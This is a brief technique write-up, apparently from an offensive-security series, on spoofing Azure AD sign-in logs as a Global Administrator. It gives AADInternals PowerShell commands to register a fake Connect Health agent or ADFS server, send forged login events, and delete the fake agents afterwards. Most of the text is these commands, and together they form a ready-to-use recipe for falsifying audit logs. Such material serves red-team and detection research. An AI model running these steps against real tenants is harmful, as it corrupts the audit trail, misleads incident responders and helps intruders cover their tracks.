Registering Fake Agents for Log Spoofing

We talked about Spoofing AAD Logon logs as a ADFS administrator in Spoofing Azure Sign-In Logs, now we'll see how it's possible to do the same as a Global Administrator on the AAD side.

As a Global Admin we can register our own AAD Connect Health agent

PS /home/otter> New-AADIntHybridHealthService -DisplayName "" -Signature "" -Type AdFederationService

or register a new ADFS server

PS /home/otter> Register-AADIntHybridHealthServiceAgent -ServiceName -MachineName "<something>" -MachineRole AdfsServer_2016

After this setup part we are, once again, free to generate fake login events

PS /home/otter> $events = @(
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "" -IPAddress "" -NetworkLocationType Extranet
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "" -IPAddress "" -NetworkLocationType Extranet
>> )
PS /home/otter> Send-AADIntHybridHealthServiceEvents -AgentInfo $agentInfo -Events $events -Verbose

To remove the fake agents we created we can use

PS /home/otter> Remove-AADIntHybridHealthService -ServiceName "<agent_service_name>"

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